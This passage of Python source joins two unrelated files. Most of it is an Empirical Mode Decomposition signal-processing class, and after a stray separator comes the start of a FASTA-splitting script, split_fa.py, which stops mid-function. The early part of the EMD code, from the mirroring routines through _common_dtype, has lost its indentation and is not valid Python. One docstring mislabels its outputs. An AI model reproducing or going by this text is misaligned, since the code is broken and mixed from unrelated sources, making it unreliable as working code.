envelope splines are well-behaved at the edges ('parabol' detector:
extrema positions are continuous times, not sample indexes).
Input:
---------
S - Signal values (1D numpy array).
T - Timeline of values (1D numpy array).
extrema - Indexes of extrema points (1D list).
Output:
---------
leftP - (time, value) of left mirrored extrema.
rightP - (time, value) of right mirrored extrema.
"""
# Need at least two extrema to perform mirroring
maxExtrema = np.zeros((2,len(maxPos)), dtype=self.DTYPE)
minExtrema = np.zeros((2,len(minPos)), dtype=self.DTYPE)
maxExtrema[0], minExtrema[0] = maxPos, minPos
maxExtrema[1], minExtrema[1] = maxVal, minVal
# Local variables
nbsym = self.nbsym
endMin, endMax = len(minPos), len(maxPos)
####################################
# Left bound
# Which extremum comes first decides the mirroring pivot.
dPos = maxPos[0] - minPos[0]
leftExtType = ["min", "max"][dPos<0]
if (leftExtType == "max"):
if (S[0]>minVal[0]) and (np.abs(dPos)>(maxPos[0]-T[0])):
# mirror signal to first extrema
expandLeftMaxPos = 2*maxPos[0] - maxPos[1:nbsym+1]
expandLeftMinPos = 2*maxPos[0] - minPos[0:nbsym]
expandLeftMaxVal = maxVal[1:nbsym+1]
expandLeftMinVal = minVal[0:nbsym]
else:
# mirror signal to beginning
# The signal start point itself acts as an extra minimum.
expandLeftMaxPos = 2*T[0] - maxPos[0:nbsym]
expandLeftMinPos = 2*T[0] - np.append(T[0], minPos[0:nbsym-1])
expandLeftMaxVal = maxVal[0:nbsym]
expandLeftMinVal = np.append(S[0], minVal[0:nbsym-1])
elif (leftExtType == "min"):
if (S[0] < maxVal[0]) and (np.abs(dPos)>(minPos[0]-T[0])):
# mirror signal to first extrema
expandLeftMaxPos = 2*minPos[0] - maxPos[0:nbsym]
expandLeftMinPos = 2*minPos[0] - minPos[1:nbsym+1]
expandLeftMaxVal = maxVal[0:nbsym]
expandLeftMinVal = minVal[1:nbsym+1]
else:
# mirror signal to beginning
expandLeftMaxPos = 2*T[0] - np.append(T[0], maxPos[0:nbsym-1])
expandLeftMinPos = 2*T[0] - minPos[0:nbsym]
expandLeftMaxVal = np.append(S[0], maxVal[0:nbsym-1])
expandLeftMinVal = minVal[0:nbsym]
# Degenerate slices (0-d result): fall back to the raw extrema.
if not expandLeftMinPos.shape:
expandLeftMinPos, expandLeftMinVal = minPos, minVal
if not expandLeftMaxPos.shape:
expandLeftMaxPos, expandLeftMaxVal = maxPos, maxVal
expandLeftMin = np.vstack((expandLeftMinPos[::-1], expandLeftMinVal[::-1]))
expandLeftMax = np.vstack((expandLeftMaxPos[::-1], expandLeftMaxVal[::-1]))
####################################
# Right bound
dPos = maxPos[-1] - minPos[-1]
rightExtType = ["min","max"][dPos>0]
if (rightExtType == "min"):
if (S[-1] < maxVal[-1]) and (np.abs(dPos)>(T[-1]-minPos[-1])):
# mirror signal to last extrema
idxMax = max(0, endMax-nbsym)
idxMin = max(0, endMin-nbsym-1)
expandRightMaxPos = 2*minPos[-1] - maxPos[idxMax:]
expandRightMinPos = 2*minPos[-1] - minPos[idxMin:-1]
expandRightMaxVal = maxVal[idxMax:]
expandRightMinVal = minVal[idxMin:-1]
else:
# mirror signal to end
idxMax = max(0, endMax-nbsym+1)
idxMin = max(0, endMin-nbsym)
expandRightMaxPos = 2*T[-1] - np.append(maxPos[idxMax:], T[-1])
expandRightMinPos = 2*T[-1] - minPos[idxMin:]
expandRightMaxVal = np.append(maxVal[idxMax:],S[-1])
expandRightMinVal = minVal[idxMin:]
elif (rightExtType == "max"):
if (S[-1] > minVal[-1]) and len(maxPos)>1 and (np.abs(dPos)>(T[-1]-maxPos[-1])):
# mirror signal to last extremum
idxMax = max(0, endMax-nbsym-1)
idxMin = max(0, endMin-nbsym)
expandRightMaxPos = 2*maxPos[-1] - maxPos[idxMax:-1]
expandRightMinPos = 2*maxPos[-1] - minPos[idxMin:]
expandRightMaxVal = maxVal[idxMax:-1]
expandRightMinVal = minVal[idxMin:]
else:
# mirror signal to end
idxMax = max(0, endMax-nbsym)
idxMin = max(0, endMin-nbsym+1)
expandRightMaxPos = 2*T[-1] - maxPos[idxMax:]
expandRightMinPos = 2*T[-1] - np.append(minPos[idxMin:], T[-1])
expandRightMaxVal = maxVal[idxMax:]
expandRightMinVal = np.append(minVal[idxMin:], S[-1])
if not expandRightMinPos.shape:
expandRightMinPos, expandRightMinVal = minPos, minVal
if not expandRightMaxPos.shape:
expandRightMaxPos, expandRightMaxVal = maxPos, maxVal
expandRightMin = np.vstack((expandRightMinPos[::-1], expandRightMinVal[::-1]))
expandRightMax = np.vstack((expandRightMaxPos[::-1], expandRightMaxVal[::-1]))
# Concatenate mirrored points around the interior extrema.
maxExtrema = np.hstack((expandLeftMax, maxExtrema, expandRightMax))
minExtrema = np.hstack((expandLeftMin, minExtrema, expandRightMin))
return maxExtrema, minExtrema
def _prepare_points_simple(self, T, S, maxPos, maxVal, minPos, minVal):
"""
Adds to signal extrema according to mirror technique.
Number of added points depends on nbsym variable.
Input:
---------
S: Signal (1D numpy array).
T: Timeline (1D numpy array).
maxPos: sorted time positions of maxima.
maxVal: signal values at maxPos positions.
minPos: sorted time positions of minima.
minVal: signal values at minPos positions.
Output:
---------
minExtrema: Position (1st row) and values (2nd row) of minima.
minExtrema: Position (1st row) and values (2nd row) of maxima.
"""
# Find indexes of pass
# Map extrema times back to sample indexes (the 'simple' detector
# works on sample positions, so each time matches exactly one T).
indmin = np.array([np.nonzero(T==t)[0] for t in minPos]).flatten()
indmax = np.array([np.nonzero(T==t)[0] for t in maxPos]).flatten()
if S.dtype != self.DTYPE: self.logger.error('S.dtype: '+str(S.dtype))
if T.dtype != self.DTYPE: self.logger.error('T.dtype: '+str(T.dtype))
# Local variables
nbsym = self.nbsym
endMin, endMax = len(minPos), len(maxPos)
####################################
# Left bound - mirror nbsym points to the left
# Pivot (lsym) is either the first extremum or the signal start,
# depending on which side the boundary sample lies on.
if indmax[0] < indmin[0]:
if S[0] > S[indmin[0]]:
lmax = indmax[1:min(endMax,nbsym+1)][::-1]
lmin = indmin[0:min(endMin,nbsym+0)][::-1]
lsym = indmax[0]
else:
lmax = indmax[0:min(endMax,nbsym)][::-1]
lmin = np.append(indmin[0:min(endMin,nbsym-1)][::-1],0)
lsym = 0
else:
if S[0] < S[indmax[0]]:
lmax = indmax[0:min(endMax,nbsym+0)][::-1]
lmin = indmin[1:min(endMin,nbsym+1)][::-1]
lsym = indmin[0]
else:
lmax = np.append(indmax[0:min(endMax,nbsym-1)][::-1],0)
lmin = indmin[0:min(endMin,nbsym)][::-1]
lsym = 0
####################################
# Right bound - mirror nbsym points to the right
if indmax[-1] < indmin[-1]:
if S[-1] < S[indmax[-1]]:
rmax = indmax[max(endMax-nbsym,0):][::-1]
rmin = indmin[max(endMin-nbsym-1,0):-1][::-1]
rsym = indmin[-1]
else:
rmax = np.append(indmax[max(endMax-nbsym+1,0):], len(S)-1)[::-1]
rmin = indmin[max(endMin-nbsym,0):][::-1]
rsym = len(S)-1
else:
if S[-1] > S[indmin[-1]]:
rmax = indmax[max(endMax-nbsym-1,0):-1][::-1]
rmin = indmin[max(endMin-nbsym,0):][::-1]
rsym = indmax[-1]
else:
rmax = indmax[max(endMax-nbsym,0):][::-1]
rmin = np.append(indmin[max(endMin-nbsym+1,0):], len(S)-1)[::-1]
rsym = len(S)-1
# In case any array missing
if not lmin.size: lmin = indmin
if not rmin.size: rmin = indmin
if not lmax.size: lmax = indmax
if not rmax.size: rmax = indmax
# Mirror points
# Reflect the chosen indexes about the pivot times T[lsym]/T[rsym].
tlmin = 2*T[lsym]-T[lmin]
tlmax = 2*T[lsym]-T[lmax]
trmin = 2*T[rsym]-T[rmin]
trmax = 2*T[rsym]-T[rmax]
# If mirrored points are not outside passed time range.
# Retry once with the signal endpoint as pivot; a second failure is
# an internal inconsistency and raises.
if tlmin[0] > T[0] or tlmax[0] > T[0]:
if lsym == indmax[0]:
lmax = indmax[0:min(endMax,nbsym)][::-1]
else:
lmin = indmin[0:min(endMin,nbsym)][::-1]
if lsym == 0:
raise Exception('Left edge BUG')
lsym = 0
tlmin = 2*T[lsym]-T[lmin]
tlmax = 2*T[lsym]-T[lmax]
if trmin[-1] < T[-1] or trmax[-1] < T[-1]:
if rsym == indmax[-1]:
rmax = indmax[max(endMax-nbsym,0):][::-1]
else:
rmin = indmin[max(endMin-nbsym,0):][::-1]
if rsym == len(S)-1:
raise Exception('Right edge BUG')
rsym = len(S)-1
trmin = 2*T[rsym]-T[rmin]
trmax = 2*T[rsym]-T[rmax]
zlmax = S[lmax]
zlmin = S[lmin]
zrmax = S[rmax]
zrmin = S[rmin]
# Assemble: mirrored-left + interior + mirrored-right.
tmin = np.append(tlmin, np.append(T[indmin], trmin))
tmax = np.append(tlmax, np.append(T[indmax], trmax))
zmin = np.append(zlmin, np.append(S[indmin], zrmin))
zmax = np.append(zlmax, np.append(S[indmax], zrmax))
maxExtrema = np.array([tmax, zmax])
minExtrema = np.array([tmin, zmin])
if maxExtrema.dtype != self.DTYPE: self.logger.error('maxExtrema.dtype: '+str(maxExtrema.dtype))
# Make double sure, that each extremum is significant
# Drop consecutive duplicate time positions (degenerate mirrors).
maxExtrema = np.delete(maxExtrema, np.where(maxExtrema[0,1:]==maxExtrema[0,:-1]),axis=1)
minExtrema = np.delete(minExtrema, np.where(minExtrema[0,1:]==minExtrema[0,:-1]),axis=1)
return maxExtrema, minExtrema
def spline_points(self, T, extrema):
    """Construct a spline through the given extrema.

    Parameters
    ----------
    T : np.ndarray
        Time (position) array over which the spline may be evaluated.
    extrema : np.ndarray
        Two-row array: positions in row 0, values in row 1.

    Returns
    -------
    tuple
        (positions, spline values over those positions).

    Raises
    ------
    ValueError
        If ``self.splineKind`` is not a supported interpolation type.
    """
    kind = self.splineKind.lower()
    # Restrict evaluation to the span actually covered by the extrema.
    t = T[np.r_[T>=extrema[0,0]] & np.r_[T<=extrema[0,-1]]]
    if t.dtype != self.DTYPE: self.logger.error('t.dtype: '+str(t.dtype))
    if extrema.dtype != self.DTYPE: self.logger.error('extrema.dtype: '+str(extrema.dtype))

    if kind == "akima":
        # `akima` is a helper defined elsewhere in this module, not scipy's.
        return t, akima(extrema[0], extrema[1], t)

    elif kind == 'cubic':
        if extrema.shape[1]>3:
            return t, interp1d(extrema[0], extrema[1], kind=kind)(t)
        else:
            # NOTE(review): presumably cubic_spline_3pts returns the
            # (t, spline) pair itself, since it is returned directly — confirm.
            return cubic_spline_3pts(extrema[0], extrema[1], t)

    elif kind in ['slinear', 'quadratic', 'linear']:
        # NOTE(review): this branch returns the full T while the spline is
        # evaluated only on the clipped t, so lengths can differ — confirm
        # this asymmetry with the 'akima'/'cubic' branches is intended.
        return T, interp1d(extrema[0], extrema[1], kind=kind)(t).astype(self.DTYPE)

    else:
        raise ValueError("No such interpolation method!")
def not_duplicate(self, s):
    """Return the indices of samples that are not interior points of a
    constant run: the first and last index are always kept, and an interior
    index i is dropped only when s[i-1] == s[i] == s[i+1].
    """
    keep = [0]
    keep.extend(
        i for i in range(1, len(s) - 1)
        if not (s[i - 1] == s[i] == s[i + 1])
    )
    keep.append(len(s) - 1)
    return keep
def find_extrema(self, t, s):
    """Dispatch extrema/zero-crossing detection to the implementation
    selected by ``self.extrema_detection`` ('parabol' or 'simple')."""
    detection = self.extrema_detection
    if detection == "parabol":
        return self._find_extrema_parabol(t, s)
    if detection == "simple":
        return self._find_extrema_simple(t, s)
    raise ValueError(
        "Incorrect extrema detection type. Please try: "
        "'simple' or 'parabol'."
    )
def _find_extrema_parabol(self, t, s):
    """
    Estimates position and value of extrema by parabolic
    interpolation based on three consecutive points.

    Input:
    ------------
        t - time array;
        s - signal;

    Output:
    ------------
        localMaxPos - position of local maxima;
        localMaxVal - values of local maxima;
        localMinPos - position of local minima;
        localMinVal - values of local minima;
        indzer - indexes of zero-crossings.
    """
    # Finds indexes of zero-crossings (sign change between neighbours).
    s1, s2 = s[:-1], s[1:]
    indzer = np.nonzero(s1*s2<0)[0]
    if np.any(s == 0):
        # Exact zeros count as crossings; a run of consecutive zeros is
        # collapsed to its midpoint index.
        iz = np.nonzero(s==0)[0]
        indz = []
        if np.any(np.diff(iz)==1):
            zer = s == 0
            dz = np.diff(np.append(np.append(0, zer), 0))
            debz = np.nonzero(dz == 1)[0]
            finz = np.nonzero(dz == -1)[0]-1
            indz = np.round((debz+finz)/2.)
        else:
            indz = iz
        indzer = np.sort(np.append(indzer, indz))

    dt = float(t[1]-t[0])
    scale = 2.*dt*dt

    # Drop interior samples of constant runs so a parabola can be fitted
    # through three distinct points.
    idx = self.not_duplicate(s)
    t = t[idx]
    s = s[idx]

    # p - previous
    # 0 - current
    # n - next
    tp, t0, tn = t[:-2], t[1:-1], t[2:]
    sp, s0, sn = s[:-2], s[1:-1], s[2:]

    tntp, t0tn, tpt0 = tn-tp, t0-tn, tp-t0
    # Denominator shared by the three-point parabola-fit coefficients.
    scale = -tntp*tpt0*t0tn

    # Coefficients of the parabola a*x^2 + b*x + c through the 3 points.
    a = tn*s0 + t0*sp + tp*sn - (tn*sp + t0*sn + tp*s0)
    b = (s0-sn)*tp**2 + (sn-sp)*t0**2 + (sp-s0)*tn**2
    c = t0*tn*t0tn*sp + tn*tp*tntp*s0 + tp*t0*tpt0*sn

    a = a/scale
    b = b/scale
    c = c/scale

    tVertex = np.zeros(a.size, dtype=self.DTYPE)

    # Extremum only if a!=0 (vertex of the parabola at -b/2a).
    nonZeroA = a!=0
    tVertex[nonZeroA] = -0.5*b[nonZeroA]/a[nonZeroA]

    # If a==0 than it's a straight line, thus no extremum.
    zeroA = a==0
    tVertex[zeroA] = tn[zeroA]

    # Keep only vertices that fall within half a sample of the centre point.
    idx = np.r_[tVertex<(t0 + 0.5*(tn-t0))] & np.r_[tVertex>=(t0-0.5*(t0-tp))]

    I = []
    for i in np.arange(len(idx))[idx]:
        if i > 2 and (i < len(t0)-2):
            # Discard vertices lying inside monotone (non-extremal)
            # stretches of five consecutive samples.
            if sp[i-1] >= s0[i-1] and sp[i] >= s0[i] and s0[i] >= sn[i] and s0[i+1] >= sn[i+1]:
                pass
            elif sp[i-1] <= s0[i-1] and sp[i] <= s0[i] and s0[i] <= sn[i] and s0[i+1] <= sn[i+1]:
                pass
            else:
                I.append(i)
        else:
            I.append(i)
    idx = np.array(I)

    a, b, c = a[idx], b[idx], c[idx]

    tVertex = tVertex[idx]
    T, S = t0[idx], s0[idx]

    # Value of the fitted parabola at its vertex.
    sVertex = a*tVertex*tVertex + b*tVertex + c

    # Sign of 'a' separates maxima (concave, a<0) from minima (a>0).
    localMaxPos, localMaxVal = tVertex[a<0], sVertex[a<0]
    localMinPos, localMinVal = tVertex[a>0], sVertex[a>0]

    return localMaxPos, localMaxVal, localMinPos, localMinVal, indzer
def _find_extrema_simple(self, t, s):
    """
    Finds extrema and zero-crossings by direct neighbour comparison.

    Input:
    ---------
        t: Time array.
        s: Signal.

    Output:
    ---------
        localMaxPos: Time positions of maxima.
        localMaxVal: Values of signal at localMaxPos positions.
        localMinPos: Time positions of minima.
        localMinVal: Values of signal at localMinPos positions.
        indzer: Indexes of zero crossings.
    """
    # Finds indexes of zero-crossings (sign change between neighbours).
    s1, s2 = s[:-1], s[1:]
    indzer = np.nonzero(s1*s2<0)[0]
    if np.any(s == 0):
        # Exact zeros count as crossings; a run of consecutive zeros is
        # collapsed to its midpoint index.
        iz = np.nonzero( s==0 )[0]
        indz = []
        if np.any(np.diff(iz)==1):
            zer = s == 0
            dz = np.diff(np.append(np.append(0, zer), 0))
            debz = np.nonzero(dz == 1)[0]
            finz = np.nonzero(dz == -1)[0]-1
            indz = np.round((debz+finz)/2.)
        else:
            indz = iz
        indzer = np.sort(np.append(indzer, indz))

    # Finds local extrema: sign change of the first difference.
    d = np.diff(s)
    d1, d2 = d[:-1], d[1:]
    indmin = np.nonzero(np.r_[d1*d2<0] & np.r_[d1<0])[0]+1
    indmax = np.nonzero(np.r_[d1*d2<0] & np.r_[d1>0])[0]+1

    # When two or more points have the same value (plateaus).
    if np.any(d==0):
        imax, imin = [], []

        bad = (d==0)
        dd = np.diff(np.append(np.append(0, bad), 0))
        debs = np.nonzero(dd == 1)[0]
        fins = np.nonzero(dd == -1)[0]
        # Plateaus touching either end of the signal cannot be extrema —
        # drop them.
        if debs[0] == 1:
            if len(debs) > 1:
                debs, fins = debs[1:], fins[1:]
            else:
                debs, fins = [], []

        if len(debs) > 0:
            if fins[-1] == len(s)-1:
                if len(debs) > 1:
                    debs, fins = debs[:-1], fins[:-1]
                else:
                    debs, fins = [], []

        lc = len(debs)
        if lc > 0:
            for k in range(lc):
                # A plateau is an extremum when the slope changes sign
                # across it; use its midpoint as the extremum index.
                if d[debs[k]-1] > 0:
                    if d[fins[k]] < 0:
                        imax.append(np.round((fins[k]+debs[k])/2.))
                else:
                    if d[fins[k]] > 0:
                        imin.append(np.round((fins[k]+debs[k])/2.))

        if len(imax) > 0:
            indmax = indmax.tolist()
            for x in imax: indmax.append(int(x))
            indmax.sort()
        if len(imin) > 0:
            indmin = indmin.tolist()
            for x in imin: indmin.append(int(x))
            indmin.sort()

    localMaxPos = t[indmax]
    localMaxVal = s[indmax]
    localMinPos = t[indmin]
    localMinVal = s[indmin]

    return localMaxPos, localMaxVal, localMinPos, localMinVal, indzer
def findExtrema(self, t, s):
    """
    Estimates position and value of extrema by parabolic
    interpolation based on three consecutive points.

    NOTE(review): appears to be a legacy variant of
    ``_find_extrema_parabol`` — ``find_extrema`` never dispatches here;
    confirm whether it is still used before relying on it.

    Input:
    ------------
        t - time array;
        s - signal;

    Output:
    ------------
        localMaxPos - position of local maxima;
        localMaxVal - values of local maxima;
        localMinPos - position of local minima;
        localMinVal - values of local minima;
        indzer - indexes of zero-crossings.
    """
    # Finds indexes of zero-crossings.
    s1, s2 = s[:-1], s[1:]
    indzer = np.nonzero(s1*s2<0)[0]
    if np.any(s == 0):
        # Exact zeros count as crossings; runs collapse to midpoints.
        iz = np.nonzero(s==0)[0]
        indz = []
        if np.any(np.diff(iz)==1):
            zer = s == 0
            dz = np.diff(np.append(np.append(0, zer), 0))
            debz = np.nonzero(dz == 1)[0]
            finz = np.nonzero(dz == -1)[0]-1
            indz = np.round((debz+finz)/2.)
        else:
            indz = iz
        indzer = np.sort(np.append(indzer, indz))

    # Drop repeated samples (keeps the last of each equal-value run).
    d = np.append(np.diff(s), 1)
    t = t[d!=0]
    s = s[d!=0]

    # Uniform sampling step is assumed from the first two samples.
    dt = t[1]-t[0]
    tVertex = np.zeros(len(t)-2, dtype=self.DTYPE)

    # p - previous
    # 0 - current
    # n - next
    tp, t0, tn = t[:-2], t[1:-1], t[2:]
    sp, s0, sn = s[:-2], s[1:-1], s[2:]

    a = sn + sp - 2*s0
    b = dt*(sn-sp) + 2*t0*(2*s0 - (sn+sp))

    # Vertex positions (only where the parabola is non-degenerate).
    idx = a!=0
    tVertex[idx] = -0.5*b[idx]/a[idx]

    # Extract only vertices in considered range (within half a step).
    idx = np.r_[tVertex<=tn-0.5*dt] & np.r_[tVertex>tp+0.5*dt]
    a, b = a[idx], b[idx]
    a, b = a/(2.*dt*dt), b/(2.*dt*dt)
    tVertex = tVertex[idx]
    T, S = t0[idx], s0[idx]

    # Estimates value of vertex - c = S - a T^2 - b T
    sVertex = a*(tVertex+T)*(tVertex-T) + b*(tVertex-T) + S

    # Sign of 'a' separates maxima (a<0) from minima (a>0).
    localMaxPos, localMaxVal = tVertex[a<0], sVertex[a<0]
    localMinPos, localMinVal = tVertex[a>0], sVertex[a>0]

    return localMaxPos, localMaxVal, localMinPos, localMinVal, indzer
def end_condition(self, Res, IMF):
    """Decide whether the EMD decomposition should stop.

    Parameters
    ----------
    Res : np.ndarray
        The (scaled) input signal.
    IMF : dict
        IMFs extracted so far, keyed by ordinal number.

    Returns
    -------
    bool
        True when the residue left after subtracting all IMFs is too
        small (in range or total power) to decompose further.
    """
    # Residue remaining after subtracting every extracted IMF.
    tmp = Res.copy()
    for imfNo in list(IMF.keys()):
        tmp -= IMF[imfNo]

    if np.max(tmp) - np.min(tmp) < self.rangeThreshold:
        self.logger.info("FINISHED -- RANGE")
        return True

    if np.sum(np.abs(tmp)) < self.totalPowerThreshold:
        self.logger.info("FINISHED -- SUM POWER")
        return True

    # Was an implicit `None` fall-through; made the negative case explicit.
    return False
def check_imf(self, imfNew, imfOld, eMax, eMin, mean):
    """
    Huang stopping criterion (a Cauchy-style convergence test).
    SD stands for Sum of the Difference.

    The candidate IMF is accepted once consecutive sifting iterations
    barely differ, measured either by a scaled variance or by the SD
    statistic.  ``mean`` is accepted for interface compatibility but is
    not used by the test itself.
    """
    # A proper IMF has all local maxima > 0 and all local minima < 0.
    if np.any(eMax[1] < 0) or np.any(eMin[1] > 0):
        return False

    # Guard: a numerically-zero candidate would blow up the SD division.
    if np.sum(imfNew**2) < 1e-10:
        return False

    diff = imfNew - imfOld
    scaledVar = np.sum(diff**2) / (max(imfOld) - min(imfOld))
    if scaledVar < self.scaledVarThreshold:
        self.logger.info("Scaled variance -- PASSED")
        return True

    std = np.sum((diff / imfNew)**2)
    if std < self.stdThreshold:
        self.logger.info("Standard deviation -- PASSED")
        return True

    return False
def _common_dtype(self, x, y):
dtype = np.find_common_type([x.dtype, y.dtype], [])
if x.dtype != dtype: x = x.astype(dtype)
if y.dtype != dtype: y = y.astype(dtype)
return x, y
def emd(self, S, T=None, maxImf=None):
    """
    Performs Empirical Mode Decomposition on signal S.

    The decomposition is limited to maxImf imf. No limitation as default.
    Returns IMF functions in numpy array format.

    Input:
    ---------
        S: Signal.
        T: Positions of signal. If none passed numpy arange is created.
        maxImf: IMF number to which decomposition should be performed.
                As a default, all IMFs are returned.

    Output:
    ---------
        IMF: Signal IMFs in numpy array form.

    Raises
    ------
    ValueError
        If T does not have the same shape as S.
    """
    if T is None: T = np.arange(len(S), dtype=S.dtype)
    if maxImf is None: maxImf = -1

    # Make sure same types are dealt.
    S, T = self._common_dtype(S, T)
    self.DTYPE = S.dtype

    # Normalise the working copy so the fixed thresholds below behave
    # consistently regardless of the input amplitude.
    Res = S.astype(self.DTYPE)
    scale = (max(Res) - min(Res))/float(self.scaleFactor)
    Res, scaledS = Res/scale, S/scale
    imf = np.zeros(len(S), dtype=self.DTYPE)
    imfOld = Res.copy()

    N = len(S)

    if Res.dtype!=self.DTYPE: self.logger.error('Res.dtype: '+str(Res.dtype))
    if scaledS.dtype!=self.DTYPE: self.logger.error('scaledS.dtype: '+str(scaledS.dtype))
    if imf.dtype!=self.DTYPE: self.logger.error('imf.dtype: '+str(imf.dtype))
    if imfOld.dtype!=self.DTYPE: self.logger.error('imfOld.dtype: '+str(imfOld.dtype))
    if T.dtype!=self.DTYPE: self.logger.error('T.dtype: '+str(T.dtype))

    if S.shape != T.shape:
        info = "Time array should be the same size as signal."
        raise ValueError(info)

    IMF = {}  # Dict for imfs signals.
    imfNo = 0
    notFinish = True

    # Compensation buffers for the Kahan-style summation used below.
    corRes = np.zeros(N, dtype=self.DTYPE)
    y = np.zeros(N, dtype=self.DTYPE)
    t = np.zeros(N, dtype=self.DTYPE)
    oldMean = np.zeros(N, dtype=self.DTYPE)
    meanEnv = np.zeros(N, dtype=self.DTYPE)

    while(notFinish):
        self.logger.debug('IMF -- '+str(imfNo))

        # Subtract the last IMF from the residue with error compensation.
        yRes = (-(imf+corRes)).astype(self.DTYPE)
        tRes = (Res + yRes).astype(self.DTYPE)
        cor = (tRes - Res) - yRes
        Res = tRes

        imf = Res.copy()
        if imf.dtype!=self.DTYPE: self.logger.error('imf.dtype: '+str(imf.dtype))
        mean = np.zeros(len(S), dtype=self.DTYPE)
        sumEnv = np.zeros(len(S), dtype=self.DTYPE)
        corEnv = np.zeros(len(S), dtype=self.DTYPE)

        # Counters
        n = 0    # All iterations for current imf.
        n_h = 0  # Counts when |#zero - #ext| <= 1.

        # Start on-screen displaying.
        if self.PLOT and self.INTERACTIVE:
            plt.ion()

        while(n<self.MAX_ITERATION):
            n += 1
            self.logger.debug("Iteration: "+str(n))

            maxPos, maxVal, minPos, minVal, indzer = self.find_extrema(T, imf)
            extNo = len(minPos)+len(maxPos)
            nzm = len(indzer)

            if extNo > 2:
                # If scale tiny it might be noise, thus no need for
                # further decomposition.
                if np.max(imf) - np.min(imf) < 1e-4:
                    msg = "Breaking decomposition as value range too small"
                    msg+= "\ndS: "+str(np.max(imf) - np.min(imf))
                    self.logger.info(msg)
                    notFinish = False
                    break

                # Plotting. Either into file, or on-screen display.
                if n>1 and self.PLOT:
                    plt.clf()
                    plt.plot(T, imf*scale, 'g')
                    plt.plot(T, maxEnv*scale, 'b')
                    plt.plot(T, minEnv*scale, 'r')
                    plt.plot(T, mean*scale, 'k--')
                    plt.title("imf{}_{:02}".format(imfNo, n-1))

                    if self.INTERACTIVE:
                        plt.draw()
                    else:
                        fName = "imf{}_{:02}".format(imfNo, n-1)
                        plt.savefig(os.path.join(self.plotPath,fName))

                if Res.dtype!=self.DTYPE: self.logger.error('Res.dtype: '+str(Res.dtype))
                if mean.dtype!=self.DTYPE: self.logger.error('mean.dtype: '+str(mean.dtype))

                imfOld = imf.copy()
                imf = Res - self.reduceScale*mean

                maxEnv, minEnv, eMax, eMin = self.extract_max_min_spline(T, imf)

                # extract_max_min_spline signals failure by returning -1.
                if type(maxEnv) == type(-1):
                    notFinish = True
                    break

                # Accumulate 0.5*(maxEnv + minEnv) with Kahan compensation.
                y = 0.5*maxEnv - cor
                t = sumEnv + y
                cor = (t - sumEnv) - y
                sumEnv = t
                y = 0.5*minEnv - cor
                t = sumEnv + y
                cor = (t - sumEnv) - y
                sumEnv = t

                oldMean = mean.copy()
                mean = sumEnv

                # Fix number of iterations.
                if self.FIXE:
                    if n>=self.FIXE+1: break

                # Fix number of iterations after number of zero-crossings
                # and extrema differ at most by one.
                elif self.FIXE_H:
                    maxPos, maxVal, minPos, minVal, indZer = self.find_extrema(T, imf)
                    extNo = len(maxPos)+len(minPos)
                    nzm = len(indZer)

                    if n == 1: continue
                    if abs(extNo-nzm)>1: n_h = 0
                    else:                n_h += 1

                    # STOP
                    if n_h >= self.FIXE_H: break

                # Stops after default stopping criteria are met.
                else:
                    maxPos, maxVal, minPos, minVal, indZer = self.find_extrema(T, imf)
                    extNo = len(maxPos) + len(minPos)
                    nzm = len(indZer)

                    # BUG FIX: this was check_imf(imf, maxEnv, minEnv,
                    # tmpMean, extNo) — `tmpMean` was never defined
                    # (NameError at runtime) and the arguments did not
                    # match the (imfNew, imfOld, eMax, eMin, mean)
                    # signature of check_imf.
                    f1 = self.check_imf(imf, imfOld, eMax, eMin, mean)
                    f2 = abs(extNo - nzm)<2

                    # STOP
                    if f1 and f2: break

            else:
                notFinish = False
                break

        # Store the sifted IMF with the compensation term removed.
        IMF[imfNo] = imf.copy() - cor
        imfNo += 1

        if self.end_condition(scaledS, IMF) or imfNo==maxImf:
            notFinish = False
            break

    # Undo the initial normalisation before returning.
    for key in list(IMF.keys()):
        IMF[key] *= scale
    nIMF = np.array([IMF[k] for k in sorted(IMF.keys())])
    return nIMF
###################################################
## Beginning of program
if __name__ == "__main__":
    # Demo: decompose a chirp-plus-trend test signal and plot each IMF.
    import pylab as plt

    # Logging options
    logging.basicConfig(level=logging.DEBUG)

    # EMD options
    maxImf = -1
    DTYPE = np.float64

    # Signal options
    N = 400
    tMin, tMax = 0, 2*np.pi
    T = np.linspace(tMin, tMax, N, dtype=DTYPE)

    # Frequency-modulated sine + quadratic trend + fixed-frequency sine.
    S = np.sin(20*T*(1+0.2*T)) + T**2 + np.sin(13*T)
    S = S.astype(DTYPE)
    print("Input S.dtype: "+str(S.dtype))

    # Prepare and run EMD
    emd = EMD()
    emd.PLOT = 0
    emd.FIXE_H = 5
    emd.nbsym = 2
    emd.splineKind = 'cubic'
    emd.DTYPE = DTYPE
    nIMF = emd.emd(S, T, maxImf)
    imfNo = nIMF.shape[0]

    # Plot results: original on top, one subplot per IMF below.
    c = 1
    r = np.ceil((imfNo+1)/c)

    plt.ioff()
    plt.subplot(r,c,1)
    plt.plot(T, S, 'r')
    plt.xlim((tMin, tMax))
    plt.title("Original signal")

    for num in range(imfNo):
        plt.subplot(r,c,num+2)
        plt.plot(T, nIMF[num],'g')
        plt.xlim((tMin, tMax))
        plt.ylabel("Imf "+str(num+1))

    plt.tight_layout()
    plt.show()
|
#!/usr/bin/env python
# split_fa.py
"""
Split a directory full of fasta files into files with equal numbers of
sequences per file
"""
import argparse
import os
from Bio import SeqIO
import glob
def split_fasta(infile, outdir, files_wanted, total_sequences, file_counter):
    """
    Split one fasta file into roughly equal-sized output files.

    infile: open handle to a fasta file.
    outdir: directory receiving the 'queryN' output files.
    files_wanted: desired number of output files.
    total_sequences: number of sequences in infile.
    file_counter: index of the first output file; the index of the last
        file written is returned so the caller can continue numbering.
    """
    # Floor division works identically on Python 2 and 3 (the old `/`
    # produced a float on Python 3, so the chunk rollover never fired);
    # '+ 1' rounds up so no more than files_wanted files are created.
    seq_per_file = (total_sequences // files_wanted) + 1
    current_seq_count = 0
    total_seq_count = 0
    outfile = open(outdir + '/query' + str(file_counter), 'w')
    try:
        for record in SeqIO.parse(infile, 'fasta'):
            current_seq_count += 1
            total_seq_count += 1
            SeqIO.write(record, outfile, 'fasta')
            if total_seq_count == total_sequences:
                break
            if current_seq_count == seq_per_file:
                # Current chunk is full -- roll over to the next output file.
                current_seq_count = 0
                file_counter += 1
                outfile.close()
                outfile = open(outdir + '/query' + str(file_counter), 'w')
    finally:
        # The final handle was previously leaked; always close it.
        outfile.close()
    return file_counter
def main():
    """Parse arguments, count the sequences in each input fasta file and
    hand the file to split_fasta, carrying the output numbering across
    files."""
    parser = argparse.ArgumentParser(description='Split fasta file into \
smaller pieces')
